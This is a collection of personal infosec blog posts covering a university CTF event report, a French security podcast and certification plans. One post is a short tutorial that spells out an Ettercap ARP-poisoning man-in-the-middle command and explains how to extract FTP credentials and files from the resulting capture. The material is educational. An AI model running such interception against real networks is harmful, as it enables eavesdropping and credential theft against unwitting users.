Kioptrix

Well, it’s been over a month since I haven’t posted anything here. Family life, work and studies have taken up most of my time. Once my daily chores completed I know longer have the energy to stay in front of the computer.  Recently I’ve been studying the MCTS for Exchange 2007.  Taking the exam in early June. I’m also starting Offsec’s second course, CTP and hoping to eventually add the OSCE next to OSCP.  Should be a tough one, but if I play my cards right all should be well.

I’m still testing for exploit-db, and keeping current (as much as I can) with all things ‘infosec’, but it’s difficult these days.  Summer means family outings, clean-up and a different work load at my current place of employment.  Rest assured, I will still be working on updating this blog… So all 2 of you reading will be fine

With CTP coming soon, I’ll need a place to write up my notes.  Same way I did for PWB (formally OffSec101), so lots of interesting snippets coming.  The VM project is on hold unfortunately.  Seeing I needed to switch to Hyper-V for work purposes, It’s difficult at the moment.

Other news, Hackfest.ca has released it’s pre-sales information for the upcoming convention in November. You can check them out here.  I’ll be attending for both days of course.

Have a good one people, wish me luck…

This past weekend’s CTF event hosted at the Sherbrooke University, and organized by the crew of HackUS.org was a complete success in my opinion. From the warm (and unexpected) welcome, right down to the ambiance and food provided. This being my first ever participation in this type of event, must say I wasn’t disappointed at all.

The battle ground HackUS provided us was exceptionally well made. All teams had lots of room to set up shop; we had meals provided for us during the whole event. Alcoholic beverages were available. As a whole, these guys organized one hell of a party. We had the standard CTF event, a Web CTF, some trivia/crypto puzzles to solve and web level-ups. Some reverse engineering, a botnet to analyze and in the end even a game of open-arena… It had everything for everyone. No complaints; nothing more was needed.

As for our performance, well didn’t fare to well compare to the other teams. 10 teams participated, and we finished 9^th overall. Still not bad for 2 guys looking to score at least 1 point… We got 60 in the end. I even got a bonus gift… An 85$ ticket for smoking near a public building.

Day 1:

We arrive at the hotel in Sherbrooke at around 15h00. After the 2 hour drive a well deserved shower is taken.
Then I decide to warm up for the upcoming activities.

All started with registration and the warm welcome (which gave me performance anxiety) from the HackUS crew. We were led to our table and then started to plug-in our gear. Seeing this was our first time at such an event we may have brought too much gear.

We’re given instructions on how things work, and we’re let loose on the network…
I of course, get another beer.

Day 2:

After 4 hours sleep, I drag my skinny a** out of bed and head back to face the war zone once more. After taking a wrong turn on the highway, I eventually got to Sherbrooke University campus.  Got a few points talked to some great people and more beer.

Day 3:

This one was rough. After two days away from home, I was starting to miss my own bed and pillow. We got a few more points in, but by this time we were out of ideas and stuck in 9^th place.

Around 15h00 that afternoon, it was the end. Prizes were given out, pictures were taken and hands were shaken. All of this with the presence of beer.

So as whole, this weekend was great. We now know what such an event looks and feels like. We’ll be better prepared for next year’s HackUS CTF.
Good job guys. You guys should be proud.

Odds are this topic has been blogged to death already, but sometimes I need to write things down so not to forget them. Also, there are times when the command line is the only option. Then again, in my opinion, one should start using the command line and then move on to GUI applications.

Ettercap is tool for computer network protocol analysis and security auditing. It’s capable of intercepting traffic, capturing credentials and conducting active “eavesdropping” against a number of common protocols. If you wish to know more, Google “Ettercap” and you’ll have lots of links referring to this tool.

Using Ettercap is a quick and easier alternative then using the “arp” command to arp poison your target(s) and redirecting traffic to you own network adapter, then re-forwarding those packets to their original destination. Again, it’s always good to be aware and able to use the “arp” command seeing that every situation is different and Ettercap may not always be available.

Imagine a simple scenario: Computer A, on the local LAN, connects to Computer B using the FTP protocol to retrieve a file. Our goal is to sniff the traffic between these two computers, retrieve either the username and password, or the file he/she is transferring over FTP. Do accomplish this we need to “arp cache poison” our victim’s machine, so to redirect traffic to our machine, sniff the traffic and then send it out to its original destination. Of course, let us assume this is on a switched environment. If you are unfamiliar with the concept of “arp cache poisoning”, I suggest you look it up… I’ll provide links at the end of this blog to push you in the right direction.

The simplest way to do this using ettercap from the command line is this:

ettercap -T -w dump -M ARP /xx.xx.xx.xx/ // output:

Where ‘xx.xx.xx.xx’ is our target machine’s IP address.

This will poison his arp cache, replacing the MAC address with our own. Of course, this is a very basic example. There are far more complex and more precise usage of this command, which are beyond the scope of this blog entry.

Let us continue…

“ –T” switch is for using the text based GUI only.

“-w dump” writes to file our packet capture session to a file called “dump”

“-M ARP” is the type of attack, in our case a “man in the middle”

“/xx.xx.xx.xx/ //” is our target’s IP address and port. Notice I have not entered any ports. So we’ll just grab everything.

“output:” just outputs everything on the screen. A “-q” or “-Tq” would’ve provided with less information on the monitor, but I always choose to see as much as possible.

Press “enter”, Ettercap will scan the network and start doing out bidding. Let it run for as long as you wish. Once you feel you have gathered enough, hit the “Q” key and ettercap will return our target’s arp cache table to its original state.

Now all you need to do is analyze the dump file. This can be done with “etterlog” or wireshark. To use wireshark, you may need to rename the file to “dump.pcap”. As for “etterlog” you’ll have to convert it to the proper format. Type “etterlog –h” and see all the wonderful options, it’s very complete.  Once you have your capture file, you can use tools such as chaosreader or network miner to retrieve the information. Or you could do it manually using wireshark.

Later on, I may just post something about filters and more “advance” methods. For now this will have to do. All the information is already on the Internet, and is readably available for anyone that takes the time to search and read.

On another note, we at Kioptrix.com are leaving for the HackUS.org CTF event this weekend. I’ll report back next week with a report. Also don’t forget that Hackfest.ca is accepting papers for the convention being held in November of this year (2010) in Quebec City Canada. Kioptrix should come out with episode 3 of our monthly podcast (French only) a week or so after the CTF in Sherbrooke. New VM images soon to be released (hint). Should be out within the next 2 weeks.

http://ettercap.sourceforge.net/

http://en.wikipedia.org/wiki/Ettercap_%28computing%29

http://en.wikipedia.org/wiki/ARP_spoofing

http://networkminer.sourceforge.net/

Hope you enjoyed the read.

Well it’s been in the making for a while. Due to certain events and health issues we’ve had trouble being consistent. Good for us, we’ve been able to work on our pet project. A all French language podcast
Loosely styled around Pauldotcom security weekly’s format, we try to inform and give out bits of information to people. We also try to entertain, but remember we are not professionals at this. No spoon feeding, you won’t learn to hack, penetrate or compromise systems, but you will learn basic information and where to start if you’re interested.

So far, we have 2 episodes available for download on iTunes, or direct links from our site.
Episode 1: We introduce ourselves, talk a bit about the Sulley Framework
Episode 2: Quick talk on Internet Explorer, Snort and Airdrop-ng
Here’s the RSS feed if you wish.

Keep in mind we’re knew at this, and will try to come out with new episodes once every 3 weeks to a month.

Also as a reminder, HackUS’s CTF is very close so check them out and get registered.
Hackfest.ca 2010′s Call for paper is also open, so if you’re interested or have something to say drop them an email

Hope you enjoy the podcast,
Have a good one.

Well, it’s almost time for Sherbrooke University’s CTF. You can get all the information at the HackUS.org site.
Everyone from Kioptrix.com will be participating…yes all 2 of us.

This 3 day event will be my first CTF experience. Should be interesting to see how my new-ish skills stack up to more seasoned and experienced computer geeks. Although I don’t consider myself a “hacker”, I expect we’ll do poorly compared to other teams. For example, the team from the Universite de Quebec a Montreal (UQAM) took first place at Hackfest.ca‘s CTF last novermber. I don’t expect to even come close to these guys. Our goal? 1 point..at least.

Nothing really security related on this post, just wanted to inform to whom ever is reading this, we’ll be reporting back from HackUS with a nice play-by-play of the CTF.

Remember to visit those sites I mentioned above, and also kioptrix.com

Have a good one,
LF